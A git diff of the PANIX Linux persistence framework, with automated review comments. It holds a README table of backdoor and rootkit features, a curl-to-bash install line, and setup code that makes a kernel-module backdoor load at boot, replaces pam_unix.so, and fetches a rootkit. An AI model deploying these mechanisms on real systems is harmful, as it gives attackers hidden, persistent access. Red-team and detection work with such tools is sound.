diff --git a/README.md b/README.md
index e38a66f..2cefc93 100644
--- a/README.md
+++ b/README.md
@@ -14,52 +14,52 @@ PANIX provides a versatile suite of features for simulating and researching Linu
 | **Feature**                      | **Description**                                                                         |**Root**|**User**|
-| **At Job Persistence**           | Implements persistence by adding entries to system jobs.                                | ✔️    | ✔️     |
-| **Authorized Keys**              | Adds a public key to the authorized_keys file for SSH access.                           | ✔️    | ✔️     |
-| **Backdoor User**                | Creates a backdoor user with `UID=0` (root privileges).                                 | ✔️    | ❌     |
-| **Backdoored /etc/passwd**       | Directly adds a malicious user entry to `/etc/passwd`.                                  | ✔️    | ❌     |
-| **Backdoored /etc/init.d**       | Establishes persistence via SysVinit (`/etc/init.d`).                                   | ✔️    | ❌     |
-| **Backdoored /etc/rc.local**     | Establishes persistence via run control (`/etc/rc.local`).                              | ✔️    | ❌     |
-| **Bind Shell**                   | Runs a pre-compiled/LOLBin bind shell for remote access.                                | ✔️    | ✔️     |
-| **Capabilities Backdoor**        | Adds specific capabilities to binaries to maintain persistence.                         | ✔️    | ❌     |
-| **Cron Job Persistence**         | Sets up cron jobs to ensure persistence across reboots.                                 | ✔️    | ✔️     |
-| **Create User**                  | Creates a new user account on the system.                                               | ✔️    | ❌     |
-| **Diamorphine Rootkit**          | Installs the Diamorphine Loadable Kernel Module Rootkit.                                | ✔️    | ❌     |
-| **Git Persistence**              | Utilizes Git hooks or pagers to persist within Git repositories.                        | ✔️    | ✔️     |
-| **Generator Persistence**        | Leverages systemd generators to create persistent services.                             | ✔️    | ❌     |
-| **Malicious Container**          | Deploys a Docker container designed to host escape.                                     | ✔️    | ✔️     |
-| **Malicious Package**            | Installs a `DPKG/RPM` package to achieve persistence.                                   | ✔️    | ❌     |
-| **LD_PRELOAD Backdoor**          | Uses `LD_PRELOAD` to inject malicious libraries for persistence.                        | ✔️    | ❌     |
-| **LKM Backdoor**                 | Loads a Loadable Kernel Module to maintain persistence.                                 | ✔️    | ❌     |
-| **MOTD Backdoor**                | Alters Message of the Day (MOTD) to establish persistence.                              | ✔️    | ❌     |
-| **Package Manager**              | Manipulates `APT/YUM/DNF` to establish persistence on usage.                            | ✔️    | ❌     |
-| **PAM Persistence**              | Installs a PAM backdoor using a rogue module or pam_exec.                               | ✔️    | ❌     |
-| **Password Change**              | Changes user passwords to secure backdoor accounts.                                     | ✔️    | ❌     |
-| **Reverse Shell**                | Establishes a reverse shell (supporting multiple LOLBins).                              | ✔️    | ✔️     |
-| **Shell Profile Persistence**    | Modifies shell profiles to execute scripts upon user login.                             | ✔️    | ✔️     |
-| **SSH Key Persistence**          | Manipulates SSH keys to maintain persistent access via SSH.                             | ✔️    | ✔️     |
-| **Sudoers Backdoor**             | Alters the `/etc/sudoers` file to grant elevated privileges.                            | ✔️    | ❌     |
-| **SUID Backdoor**                | Backdoors binaries by setting the SUID bit.                                             | ✔️    | ❌     |
-| **System Binary Backdoor**       | Wraps system binaries to include backdoor functionality.                                | ✔️    | ❌     |
-| **Systemd Service**              | Creates systemd services that ensure persistence on reboot.                             | ✔️    | ✔️     |
-| **Udev Persistence**             | Utilizes drivers to persist at the hardware interaction level.                          | ✔️    | ❌     |
-| **Web Shell Persistence**        | Deploys web servers for remote access via web interfaces.                               | ✔️    | ✔️     |
-| **XDG Autostart Persistence**    | Employs XDG autostart directories to persist upon user login.                           | ✔️    | ✔️     |
+| **At Job Persistence**           | Implements persistence by adding entries to system jobs.                                | ✅    | ✅     |
+| **Authorized Keys**              | Adds a public key to the authorized_keys file for SSH access.                           | ✅    | ✅     |
+| **Backdoor User**                | Creates a backdoor user with `UID=0` (root privileges).                                 | ✅    | ❌     |
+| **Backdoored /etc/passwd**       | Directly adds a malicious user entry to `/etc/passwd`.                                  | ✅    | ❌     |
+| **Backdoored /etc/init.d**       | Establishes persistence via SysVinit (`/etc/init.d`).                                   | ✅    | ❌     |
+| **Backdoored /etc/rc.local**     | Establishes persistence via run control (`/etc/rc.local`).                              | ✅    | ❌     |
+| **Bind Shell**                   | Runs a pre-compiled/LOLBin bind shell for remote access.                                | ✅    | ✅     |
+| **Capabilities Backdoor**        | Adds specific capabilities to binaries to maintain persistence.                         | ✅    | ❌     |
+| **Cron Job Persistence**         | Sets up cron jobs to ensure persistence across reboots.                                 | ✅    | ✅     |
+| **Create User**                  | Creates a new user account on the system.                                               | ✅    | ❌     |
+| **Diamorphine Rootkit**          | Installs the Diamorphine Loadable Kernel Module Rootkit.                                | ✅    | ❌     |
+| **Git Persistence**              | Utilizes Git hooks or pagers to persist within Git repositories.                        | ✅    | ✅     |
+| **Generator Persistence**        | Leverages systemd generators to create persistent services.                             | ✅    | ❌     |
+| **Malicious Container**          | Deploys a Docker container designed to host escape.                                     | ✅    | ✅     |
+| **Malicious Package**            | Installs a `DPKG/RPM` package to achieve persistence.                                   | ✅    | ❌     |
+| **LD_PRELOAD Backdoor**          | Uses `LD_PRELOAD` to inject malicious libraries for persistence.                        | ✅    | ❌     |
+| **LKM Backdoor**                 | Loads a Loadable Kernel Module to maintain persistence.                                 | ✅    | ❌     |
+| **MOTD Backdoor**                | Alters Message of the Day (MOTD) to establish persistence.                              | ✅    | ❌     |
+| **Package Manager**              | Manipulates `APT/YUM/DNF` to establish persistence on usage.                            | ✅    | ❌     |
+| **PAM Persistence**              | Installs a PAM backdoor using a rogue module or pam_exec.                               | ✅    | ❌     |
+| **Password Change**              | Changes user passwords to secure backdoor accounts.                                     | ✅    | ❌     |
+| **Reverse Shell**                | Establishes a reverse shell (supporting multiple LOLBins).                              | ✅    | ✅     |
+| **Shell Profile Persistence**    | Modifies shell profiles to execute scripts upon user login.                             | ✅    | ✅     |
+| **SSH Key Persistence**          | Manipulates SSH keys to maintain persistent access via SSH.                             | ✅    | ✅     |
+| **Sudoers Backdoor**             | Alters the `/etc/sudoers` file to grant elevated privileges.                            | ✅    | ❌     |
+| **SUID Backdoor**                | Backdoors binaries by setting the SUID bit.                                             | ✅    | ❌     |
+| **System Binary Backdoor**       | Wraps system binaries to include backdoor functionality.                                | ✅    | ❌     |
+| **Systemd Service**              | Creates systemd services that ensure persistence on reboot.                             | ✅    | ✅     |
+| **Udev Persistence**             | Utilizes drivers to persist at the hardware interaction level.                          | ✅    | ❌     |
+| **Web Shell Persistence**        | Deploys web servers for remote access via web interfaces.                               | ✅    | ✅     |
+| **XDG Autostart Persistence**    | Employs XDG autostart directories to persist upon user login.                           | ✅    | ✅     |
 # Support
 PANIX offers comprehensive support across various Linux distributions.
-| **Distribution**     | **Support** | **Tested Version**                |
-| **Debian**       | ✔️       | Debian 11 & 12                          |
-| **Ubuntu**       | ✔️       | Ubuntu 22.04 (Diamorphine unavailable)  |
-| **RHEL**         | ✔️       | RHEL 9 (MOTD unavailable)               |
-| **CentOS**       | ✔️       | CentOS Stream 9 & 7 (MOTD unavailable)  |
-| **Fedora**       | ✔️       | Not fully tested                        |
-| **Arch Linux**   | ✔️       | Not fully tested                        |
-| **OpenSUSE**     | ✔️       | Not fully tested                        |
+| **Distribution** | **Support** | **Tested Version**                   |
+| **Debian**       | ✅       | Debian 11 & 12                          |
+| **Ubuntu**       | ✅       | Ubuntu 22.04 (Diamorphine unavailable)  |
+| **RHEL**         | ✅       | RHEL 9 (MOTD unavailable)               |
+| **CentOS**       | ✅       | CentOS Stream 9 & 7 (MOTD unavailable)  |
+| **Fedora**       | ✅       | Not fully tested                        |
+| **Arch Linux**   | ✅       | Not fully tested                        |
+| **OpenSUSE**     | ✅       | Not fully tested                        |
 Custom or outdated Linux distributions may have different configurations or lack specific features, causing mechanisms to fail on untested versions. If a default command fails, use the `--custom` flag available in most features to adjust paths and commands for your environment. If that doesn't resolve the issue, review and modify the script to suit your needs.
@@ -97,15 +97,15 @@ This streamlined structure promotes efficient development, testing, and deployme
 # Getting Started
-Getting PANIX up-and-running is as simple as downloading the script from the [release page](https://github.com/Aegrah/PANIX/releases/tag/panix-v2.0.0) and executing it:
+Getting PANIX up-and-running is as simple as downloading the script from the [release page](https://github.com/Aegrah/PANIX/releases/tag/panix-v2.0.1) and executing it:
-curl -sL https://github.com/Aegrah/PANIX/releases/download/panix-v2.0.0/panix.sh | bash
+curl -sL https://github.com/Aegrah/PANIX/releases/download/panix-v2.0.1/panix.sh | bash
 Or download it and execute it manually:
 # Download through curl or wget
-curl -sL https://github.com/Aegrah/PANIX/releases/download/panix-v2.0.0/panix.sh -o panix.sh
-wget https://github.com/Aegrah/PANIX/releases/download/panix-v2.0.0/panix.sh -O panix.sh
+curl -sL https://github.com/Aegrah/PANIX/releases/download/panix-v2.0.1/panix.sh -o panix.sh
+wget https://github.com/Aegrah/PANIX/releases/download/panix-v2.0.1/panix.sh -O panix.sh
 # Grant execution permissions and execute the script.
 chmod +x panix.sh
diff --git a/modules/revert/revert_lkm.sh b/modules/revert/revert_lkm.sh
index 3cefc63..81f980d 100644
--- a/modules/revert/revert_lkm.sh
+++ b/modules/revert/revert_lkm.sh
@@ -53,6 +53,12 @@ revert_lkm() {
 		echo "[-] Temporary directory '${lkm_compile_dir}' not found."
+	# Remove panix from /etc/modules, /etc/modules-load.d/panix.conf and /usr/lib/modules-load.d/panix.conf
+	echo "[+] Removing panix from /etc/modules, /etc/modules-load.d/ and /usr/lib/modules-load.d/..."
+	sed -i '/panix/d' /etc/modules
+	rm -f /etc/modules-load.d/panix.conf
+	rm -f /usr/lib/modules-load.d/panix.conf
 	# Update module dependencies
 	echo "[+] Updating module dependencies..."
 	depmod -a
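Review bot: The added `sed -i '/panix/d' /etc/modules` runs without checking that `/etc/modules` exists and deletes every line that merely contains `panix`, so it errors on hosts without the file and can drop unrelated entries on hosts that have it. The rootkit revert in this same commit guards with `[ -f "/etc/modules" ]` and anchors the pattern; the same form here would be `[ -f /etc/modules ] && sed -i '/^panix$/d' /etc/modules`. The file names are hard-coded as `panix.conf` while the setup hunk writes `${lkm_name}.conf`; if `lkm_name` can differ from `panix` (its assignment is outside the hunks shown), the load entries survive the revert and the module is loaded again at boot. The body of `revert_lkm` starts and ends outside this hunk.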
diff --git a/modules/revert/revert_malicious_package.sh b/modules/revert/revert_malicious_package.sh
index 7d7dd08..1991dad 100644
--- a/modules/revert/revert_malicious_package.sh
+++ b/modules/revert/revert_malicious_package.sh
@@ -1,93 +1,100 @@
 revert_malicious_package() {
-    usage_revert_malicious_package() {
-        echo "Usage: ./panix.sh --revert malicious-package"
-        echo "Reverts any changes made by the setup_malicious_package module."
-    }
+	usage_revert_malicious_package() {
+		echo "Usage: ./panix.sh --revert malicious-package"
+		echo "Reverts any changes made by the setup_malicious_package module."
+	}
-    echo "[+] Reverting malicious package..."
+	echo "[+] Reverting malicious package..."
-    if ! check_root; then
-        echo "Error: This function can only be run as root."
-        return 1
-    fi
+	if ! check_root; then
+		echo "Error: This function can only be run as root."
+		return 1
+	fi
-    local mechanism=""
-    local PACKAGE_NAME="panix"
+	local mechanism=""
+	local PACKAGE_NAME="panix"
-    # Detect if RPM or DPKG was used
-    if command -v rpm &> /dev/null && rpm -qa | grep -q "^${PACKAGE_NAME}"; then
-        mechanism="rpm"
-    elif command -v dpkg &> /dev/null && dpkg -l | grep -q "^ii  ${PACKAGE_NAME} "; then
-        mechanism="dpkg"
-    else
-        echo "[-] Malicious package '${PACKAGE_NAME}' not found via RPM or DPKG. No action needed."
-    fi
+	# Detect if RPM or DPKG was used
+	if command -v rpm &> /dev/null && rpm -qa | grep -q "^${PACKAGE_NAME}"; then
+		mechanism="rpm"
+	elif command -v dpkg &> /dev/null && dpkg -l | grep -q "^ii  ${PACKAGE_NAME} "; then
+		mechanism="dpkg"
+	else
+		echo "[-] Malicious package '${PACKAGE_NAME}' not found via RPM or DPKG. No action needed."
+	fi
-    if [[ "$mechanism" == "rpm" ]]; then
-        echo "[+] Removing RPM package '${PACKAGE_NAME}'..."
-        rpm -e --noscripts "${PACKAGE_NAME}"
-        if [[ $? -eq 0 ]]; then
-            echo "[+] RPM package '${PACKAGE_NAME}' removed successfully."
-        else
-            echo "[-] Failed to remove RPM package '${PACKAGE_NAME}'."
-        fi
+	if [[ "$mechanism" == "rpm" ]]; then
+		echo "[+] Removing RPM package '${PACKAGE_NAME}'..."
+		rpm -e --noscripts "${PACKAGE_NAME}"
+		if [[ $? -eq 0 ]]; then
+			echo "[+] RPM package '${PACKAGE_NAME}' removed successfully."
+		else
+			echo "[-] Failed to remove RPM package '${PACKAGE_NAME}'."
+		fi
-        # Remove the RPM file from /var/lib/rpm
-        if [[ -f "/var/lib/rpm/${PACKAGE_NAME}.rpm" ]]; then
-            echo "[+] Removing RPM file '/var/lib/rpm/${PACKAGE_NAME}.rpm'..."
-            rm -f "/var/lib/rpm/${PACKAGE_NAME}.rpm"
-            echo "[+] RPM file removed."
-        else
-            echo "[-] RPM file '/var/lib/rpm/${PACKAGE_NAME}.rpm' not found."
-        fi
+		# Remove the RPM file from /var/lib/rpm
+		if [[ -f "/var/lib/rpm/${PACKAGE_NAME}.rpm" ]]; then
+			echo "[+] Removing RPM file '/var/lib/rpm/${PACKAGE_NAME}.rpm'..."
+			rm -f "/var/lib/rpm/${PACKAGE_NAME}.rpm"
+			echo "[+] RPM file removed."
+		else
+			echo "[-] RPM file '/var/lib/rpm/${PACKAGE_NAME}.rpm' not found."
+		fi
-    elif [[ "$mechanism" == "dpkg" ]]; then
-        echo "[+] Removing DPKG package '${PACKAGE_NAME}'..."
-        dpkg --purge "${PACKAGE_NAME}"
-        if [[ $? -eq 0 ]]; then
-            echo "[+] DPKG package '${PACKAGE_NAME}' removed successfully."
-        else
-            echo "[-] Failed to remove DPKG package '${PACKAGE_NAME}'."
-        fi
-    fi
+	elif [[ "$mechanism" == "dpkg" ]]; then
+		echo "[+] Removing DPKG package '${PACKAGE_NAME}'..."
+		dpkg --purge "${PACKAGE_NAME}"
+		if [[ $? -eq 0 ]]; then
+			echo "[+] DPKG package '${PACKAGE_NAME}' removed successfully."
+		else
+			echo "[-] Failed to remove DPKG package '${PACKAGE_NAME}'."
+		fi
+	fi
-    # Remove the cron job added by the setup function
-    echo "[+] Removing cron job associated with '${PACKAGE_NAME}'..."
-    # Create a temporary file to store the current crontab
-    crontab -l > /tmp/current_cron$$ 2>/dev/null
-    if [[ $? -ne 0 ]]; then
-        echo "[-] No crontab for user $(whoami). No action needed."
-        rm -f /tmp/current_cron$$
-    else
-        # Remove lines containing the malicious package commands
-        grep -v ".*${PACKAGE_NAME}.*" /tmp/current_cron$$ > /tmp/new_cron$$
-        # Install the new crontab
-        crontab /tmp/new_cron$$
-        echo "[+] Cron job removed."
-        # Clean up temporary files
-        rm -f /tmp/current_cron$$ /tmp/new_cron$$
-    fi
+	# Remove the cron job added by the setup function
+	echo "[+] Removing cron job associated with '${PACKAGE_NAME}'..."
+	# Create a temporary file to store the current crontab
+	crontab -l > /tmp/current_cron$$ 2>/dev/null
+	if [[ $? -ne 0 ]]; then
+		echo "[-] No crontab for user $(whoami). No action needed."
+		rm -f /tmp/current_cron$$
+	else
+		# Remove lines containing the malicious package commands
+		grep -v ".*${PACKAGE_NAME}.*" /tmp/current_cron$$ > /tmp/new_cron$$
+		# Install the new crontab
+		crontab /tmp/new_cron$$
+		echo "[+] Cron job removed."
+		# Clean up temporary files
+		rm -f /tmp/current_cron$$ /tmp/new_cron$$
+	fi
-    # Clean up any remaining build directories (RPM)
-    if [[ -d "~/rpmbuild" ]]; then
-        echo "[+] Removing RPM build directory '~/rpmbuild'..."
-        rm -rf ~/rpmbuild
-        echo "[+] RPM build directory removed."
-    fi
+	# Clean up any remaining build directories (RPM)
+	if [[ -d "~/rpmbuild" ]]; then
+		echo "[+] Removing RPM build directory '~/rpmbuild'..."
+		rm -rf ~/rpmbuild
+		echo "[+] RPM build directory removed."
+	fi
-    # Clean up any remaining package directories (DPKG)
-    if [[ -d "${PACKAGE_NAME}" ]]; then
-        echo "[+] Removing package directory '${PACKAGE_NAME}'..."
-        rm -rf "${PACKAGE_NAME}"
-        echo "[+] Package directory removed."
-    fi
+	# Clean up any remaining package directories (DPKG)
+	if [[ -d "${PACKAGE_NAME}" ]]; then
+		echo "[+] Removing package directory '${PACKAGE_NAME}'..."
+		rm -rf "${PACKAGE_NAME}"
+		echo "[+] Package directory removed."
+	fi
-    # Remove any lingering files in /var/lib/dpkg/info (DPKG)
-    if [[ -d "/var/lib/dpkg/info" ]]; then
-        echo "[+] Cleaning up '/var/lib/dpkg/info'..."
-        rm -f "/var/lib/dpkg/info/${PACKAGE_NAME}."*
-        echo "[+] Cleanup completed."
-    fi
+	# Remove any lingering files in /var/lib/dpkg/info (DPKG)
+	if [[ -d "/var/lib/dpkg/info" ]]; then
+		echo "[+] Cleaning up '/var/lib/dpkg/info'..."
+		rm -f "/var/lib/dpkg/info/${PACKAGE_NAME}."*
+		echo "[+] Cleanup completed."
+	fi
-    return 0
+	# Remove any package files left in the home directory
+	if [[ -f "~/${PACKAGE_NAME}.deb" || -f "~/${PACKAGE_NAME}.rpm" ]]; then
+		echo "[+] Removing package files '~/${PACKAGE_NAME}.deb' and/or '~/${PACKAGE_NAME}.rpm'..."
+		rm -f ~/${PACKAGE_NAME}.deb ~/${PACKAGE_NAME}.rpm
+		echo "[+] Package files removed."
+	fi
+	return 0
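Review bot: The new home-directory cleanup never runs, because `~` is not expanded inside double quotes: `[[ -f "~/${PACKAGE_NAME}.deb" || -f "~/${PACKAGE_NAME}.rpm" ]]` looks for a path under a literal `~` directory, so the package files stay on disk. Use `$HOME` instead, e.g. `if [[ -f "$HOME/${PACKAGE_NAME}.deb" || -f "$HOME/${PACKAGE_NAME}.rpm" ]]; then` followed by `rm -f -- "$HOME/${PACKAGE_NAME}.deb" "$HOME/${PACKAGE_NAME}.rpm"`. The re-indented `[[ -d "~/rpmbuild" ]]` test has the same defect. Separately, the crontab rewrite runs as root through the predictable names `/tmp/current_cron$$` and `/tmp/new_cron$$`; files created with `mktemp` would prevent another local user from pre-creating those paths.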
diff --git a/modules/revert/revert_pam.sh b/modules/revert/revert_pam.sh
index 1716ae6..70e9860 100644
--- a/modules/revert/revert_pam.sh
+++ b/modules/revert/revert_pam.sh
@@ -9,52 +9,29 @@ revert_pam() {
 		return 1
-	# Function to restore the original pam_unix.so module
-	restore_pam_module() {
-		echo "[+] Restoring original PAM module..."
-		# Detect the Linux distribution and package manager
-		if [ -f /etc/os-release ]; then
-			. /etc/os-release
-			linux_distro=${ID_LIKE:-$ID}
-		else
-			linux_distro=$(uname -s | tr '[:upper:]' '[:lower:]')
-		fi
-		case "$linux_distro" in
-			*ubuntu*|*debian*|*mint*|*kali*)
-				echo "[+] Detected Debian-based distribution."
-				echo "[+] Reinstalling 'libpam-modules' package..."
-				apt-get update >/dev/null 2>&1
-				apt-get install --reinstall -y libpam-modules >/dev/null 2>&1
+	remove_rogue_pam() {
+		echo "[+] Searching for rogue PAM module"
+		# Check for the presence of the malicious PAM module
+		pam_module_paths=(
+			"/lib/security/pam_unix.so"
+			"/usr/lib/security/pam_unix.so"
+			"/usr/lib64/security/pam_unix.so"
+			"/lib/x86_64-linux-gnu/security/pam_unix.so"
+			"/usr/lib/x86_64-linux-gnu/security/pam_unix.so"
+			"/lib64/security/pam_unix.so"
+		)
+		# Revert pam_unix.so with the pam_unix.so.bak backup 
+		for pam_module in "${pam_module_paths[@]}"; do
+			if [[ -f "$pam_module.bak" ]]; then
+				mv -f "$pam_module.bak" "$pam_module"
 				if [[ $? -eq 0 ]]; then
-					echo "[+] 'libpam-modules' reinstalled successfully."
+					echo "[+] Restored original PAM module '$pam_module'."
-					echo "[-] Failed to reinstall 'libpam-modules'."
+					echo "[-] Failed to restore original PAM module '$pam_module'."
-				;;
-			*rhel*|*centos*|*fedora*)
-				echo "[+] Detected RPM-based distribution."
-				echo "[+] Reinstalling 'pam' package..."
-				if command -v yum &>/dev/null; then
-					yum reinstall -y pam >/dev/null 2>&1
-				elif command -v dnf &>/dev/null; then
-					dnf reinstall -y pam >/dev/null 2>&1
-				else
-					echo "[-] Neither 'yum' nor 'dnf' package manager found."
-					return 1
-				fi
-				if [[ $? -eq 0 ]]; then
-					echo "[+] 'pam' reinstalled successfully."
-				else
-					echo "[-] Failed to reinstall 'pam'."
-				fi
-				;;
-			*)
-				echo "[-] Unsupported distribution: $linux_distro"
-				return 1
-				;;
-		esac
+			fi
+		done
 	# Function to remove malicious PAM_EXEC configurations and scripts
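Review bot: `remove_rogue_pam` treats any `pam_unix.so.bak` as the genuine module and prints nothing when no backup is found, so the revert can finish with a modified `pam_unix.so` still in place. That is the case for an install made before this release (the backup step is new in the setup hunk) and, as far as that hunk shows, after a second setup run, where `mv -f "$dest_dir/pam_unix.so" "$dest_dir/pam_unix.so.bak"` replaces the clean backup with the already-swapped library. The removed code inspected the installed file and reinstalled the distribution package; keeping that as a fallback, or checking the result with `dpkg --verify libpam-modules` or `rpm -V pam` and reporting a mismatch, would make the outcome trustworthy. `pam_module_paths` and `pam_module` should also be declared `local`, and the function's closing lines are outside this hunk.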
@@ -135,32 +112,8 @@ revert_pam() {
-	# Check for the presence of the malicious PAM module
-	is_pam_module_replaced=false
-	pam_module_paths=(
-		"/lib/security/pam_unix.so"
-		"/usr/lib64/security/pam_unix.so"
-		"/lib/x86_64-linux-gnu/security/pam_unix.so"
-		"/lib64/security/pam_unix.so"
-	)
-	for pam_module in "${pam_module_paths[@]}"; do
-		if [[ -f "$pam_module" ]]; then
-			# Check if the pam_unix.so has been modified
-			if strings "$pam_module" | grep -q "PANIX"; then
-				is_pam_module_replaced=true
-				break
-			fi
-		fi
-	done
-	if [[ "$is_pam_module_replaced" = true ]]; then
-		echo "[+] Malicious PAM module detected."
-		restore_pam_module
-	else
-		echo "[-] No malicious PAM module detected."
-	fi
 	# Remove PAM_EXEC backdoor and logging
+	remove_rogue_pam
diff --git a/modules/revert/revert_rootkit.sh b/modules/revert/revert_rootkit.sh
index 0e27437..5ae4309 100644
--- a/modules/revert/revert_rootkit.sh
+++ b/modules/revert/revert_rootkit.sh
@@ -100,6 +100,24 @@ revert_rootkit() {
+	# Remove the module from /etc/modules, /etc/modules-load.d/ and /usr/lib/modules-load.d/
+	echo "[+] Removing rootkit module from /etc/modules, /etc/modules-load.d/ and /usr/lib/modules-load.d/..."
+	if [ -d "/etc/modules-load.d" ]; then
+		echo "${rk_name}" > /etc/modules-load.d/${rk_name}.conf
+	fi
+	if [ -d "/usr/lib/modules-load.d" ]; then
+		echo "${rk_name}" > /usr/lib/modules-load.d/${rk_name}.conf
+	fi
+	if [ -f "/etc/modules" ]; then
+		if grep -q "^${rk_name}$" /etc/modules; then
+			sed -i "/^${rk_name}$/d" /etc/modules
+		fi
+	fi
+	echo "[+] Rootkit module removed from /etc/modules, /etc/modules-load.d/ and /usr/lib/modules-load.d/"
 	# Step 4: Remove /dev/shm/.rk directory
 	remove_directory "$rk_path"
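Review bot: The two `modules-load.d` branches do the opposite of what the message announces: `echo "${rk_name}" > /etc/modules-load.d/${rk_name}.conf` creates the load entry instead of deleting it, so after a revert the host is still configured to load the module at every boot. These lines look copied from the setup code; they should be `rm -f -- "/etc/modules-load.d/${rk_name}.conf"` and `rm -f -- "/usr/lib/modules-load.d/${rk_name}.conf"`. The setup hunk names the entries after `${identifier}`, so it is worth confirming that `rk_name` holds the same value here (its assignment is outside this hunk). `revert_rootkit` begins and ends outside the hunk.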
diff --git a/modules/setup_lkm.sh b/modules/setup_lkm.sh
index 0a790c8..3075631 100644
--- a/modules/setup_lkm.sh
+++ b/modules/setup_lkm.sh
@@ -130,10 +130,10 @@ setup_lkm_backdoor() {
 		# Ensure proper escaping for C string
-        mkdir -p $(dirname $lkm_destination)
+		mkdir -p $(dirname $lkm_destination)
-    mkdir -p ${lkm_compile_dir}
+	mkdir -p ${lkm_compile_dir}
 	cat <<-EOF > ${lkm_source}
 	#include <linux/module.h>
@@ -176,12 +176,12 @@ setup_lkm_backdoor() {
-    # Check if the source file was created
-    if [ ! -f "$lkm_source" ]; then
-        echo "Failed to create the kernel module source code at $lkm_source"
-        exit 1
-    else
-		echo "Kernel module source code created: $lkm_source"
+	# Check if the source file was created
+	if [ ! -f "$lkm_source" ]; then
+		echo "[-] Failed to create the kernel module source code at $lkm_source"
+		exit 1
+	else
+		echo "[+] Kernel module source code created: $lkm_source"
 	# Create the Makefile
@@ -196,11 +196,11 @@ clean:
 	make -C /lib/modules/\$(shell uname -r)/build M=\$(PWD) clean
-    if [ ! -f "${lkm_compile_dir}/Makefile" ]; then
-		echo "Failed to create the Makefile at ${lkm_compile_dir}/Makefile"
+	if [ ! -f "${lkm_compile_dir}/Makefile" ]; then
+		echo "[-] Failed to create the Makefile at ${lkm_compile_dir}/Makefile"
 		exit 1
-    else
-		echo "Makefile created: ${lkm_compile_dir}/Makefile"
+	else
+		echo "[+] Makefile created: ${lkm_compile_dir}/Makefile"
 	# Compile the kernel module using make
@@ -208,7 +208,7 @@ EOF
 	if [ $? -ne 0 ]; then
-		echo "Compilation failed. Exiting."
+		echo "[-] Compilation failed. Exiting."
 		exit 1
@@ -216,18 +216,35 @@ EOF
 	cp ${lkm_compile_dir}/${lkm_name}.ko ${lkm_destination}
 	if [ $? -ne 0 ]; then
-		echo "Copying module failed. Exiting."
+		echo "[-] Copying module failed. Exiting."
 		exit 1
-	echo "Kernel module compiled successfully: ${lkm_destination}"
+	echo "[+] Kernel module compiled successfully: ${lkm_destination}"
 	sudo insmod ${lkm_destination}
 	if [[ $? -ne 0 ]]; then
-		echo "Failed to load the kernel module. Check dmesg for errors."
+		echo "[-] Failed to load the kernel module. Check dmesg for errors."
 		exit 1
-	echo "Kernel module loaded successfully. Check dmesg for the output."
+	# Add kernel module to /etc/modules, /etc/modules-load.d/ and /usr/lib/modules-load.d/
+	echo "[+] Adding kernel module to /etc/modules, /etc/modules-load.d/ and /usr/lib/modules-load.d/..."
+	if [ -d "/etc/modules-load.d" ]; then
+		echo "${lkm_name}" > /etc/modules-load.d/${lkm_name}.conf
+	fi
+	if [ -d "/usr/lib/modules-load.d" ]; then
+		echo "${lkm_name}" > /usr/lib/modules-load.d/${lkm_name}.conf
+	fi
+	if [ -f "/etc/modules" ]; then
+		if ! grep -q "^${lkm_name}$" /etc/modules; then
+			echo "${lkm_name}" >> /etc/modules
+		fi
+	fi
+	echo "[+] Kernel module loaded successfully. Check dmesg for the output."
+	echo "[+] Kernel module added to /etc/modules, /etc/modules-load.d/ and /usr/lib/modules-load.d/"
 	echo "[+] LKM backdoor established!"
diff --git a/modules/setup_pam.sh b/modules/setup_pam.sh
index ce5c1f5..94b549d 100644
--- a/modules/setup_pam.sh
+++ b/modules/setup_pam.sh
@@ -215,9 +215,11 @@ setup_pam_persistence() {
 			local dest_dir=""
 			local possible_dirs=(
-				"/usr/lib64/security"
-				"/lib/x86_64-linux-gnu/security"
+				"/lib/x86_64-linux-gnu/security"
+				"/usr/lib/security"
+				"/usr/lib64/security"
+				"/usr/lib/x86_64-linux-gnu/security"
 			for dir in "${possible_dirs[@]}"; do
@@ -232,6 +234,9 @@ setup_pam_persistence() {
 				exit 1
+			echo "[+] Backing up original PAM library..."
+			mv -f "$dest_dir/pam_unix.so" "$dest_dir/pam_unix.so.bak"
 			echo "[+] Copying PAM library to $dest_dir..."
 			mv -f modules/pam_unix/.libs/pam_unix.so "$dest_dir"
diff --git a/modules/setup_rootkit.sh b/modules/setup_rootkit.sh
index 91fa759..0c71ffc 100644
--- a/modules/setup_rootkit.sh
+++ b/modules/setup_rootkit.sh
@@ -1,23 +1,23 @@
 setup_rootkit() {
-    # References:
-    # Diamorphine Rootkit: https://github.com/m0nad/Diamorphine
-    # Inspiration: https://github.com/MatheuZSecurity/D3m0n1z3dShell/blob/main/scripts/implant_rootkit.sh
-    # Inspiration: https://github.com/Trevohack/DynastyPersist/blob/main/src/dynasty.sh#L194
-    local rk_path="/dev/shm/.rk"
-    local tmp_path="/tmp"
-    local zip_url="https://github.com/Aegrah/Diamorphine/releases/download/v1.0.0/diamorphine.zip"
-    local tar_url="https://github.com/Aegrah/Diamorphine/releases/download/v1.0.0/diamorphine.tar"
-    local clone_url="https://github.com/Aegrah/Diamorphine.git"
-    local secret=""
-    local identifier=""
+	# References:
+	# Diamorphine Rootkit: https://github.com/m0nad/Diamorphine
+	# Inspiration: https://github.com/MatheuZSecurity/D3m0n1z3dShell/blob/main/scripts/implant_rootkit.sh
+	# Inspiration: https://github.com/Trevohack/DynastyPersist/blob/main/src/dynasty.sh#L194
+	local rk_path="/dev/shm/.rk"
+	local tmp_path="/tmp"
+	local zip_url="https://github.com/Aegrah/Diamorphine/releases/download/v1.0.0/diamorphine.zip"
+	local tar_url="https://github.com/Aegrah/Diamorphine/releases/download/v1.0.0/diamorphine.tar"
+	local clone_url="https://github.com/Aegrah/Diamorphine.git"
+	local secret=""
+	local identifier=""
 	if ! check_root; then
 		echo "Error: This function can only be run as root."
 		exit 1
-    usage_rootkit() {
+	usage_rootkit() {
 		echo "Usage: ./panix.sh --rootkit"
 		echo "--examples                 Display command examples"
 		echo "--secret <secret>          Specify the secret"
@@ -82,57 +82,57 @@ setup_rootkit() {
 		exit 1
-    echo "[!] There are known issues with the Diamorphine rootkit for Ubuntu 22.04."
-    echo "[!] This module is tested on Debian 11, 12, RHEL 9, CentOS Stream 9 and CentOS 7."
-    echo "[!] I cannot guarantee that it will work on other distributions."
-    sleep 5
-    mkdir -p $rk_path
-    # Check if wget or curl is installed
-    if command -v wget >/dev/null 2>&1; then
-        downloader="wget"
-    elif command -v curl >/dev/null 2>&1; then
-        downloader="curl"
-    else
-        echo "Error: Neither 'wget' nor 'curl' is installed. Please install one of them to proceed."
-        exit 1
-    fi
-    # Function to download files using the available downloader
-    download_file() {
-        local url="$1"
-        local output="$2"
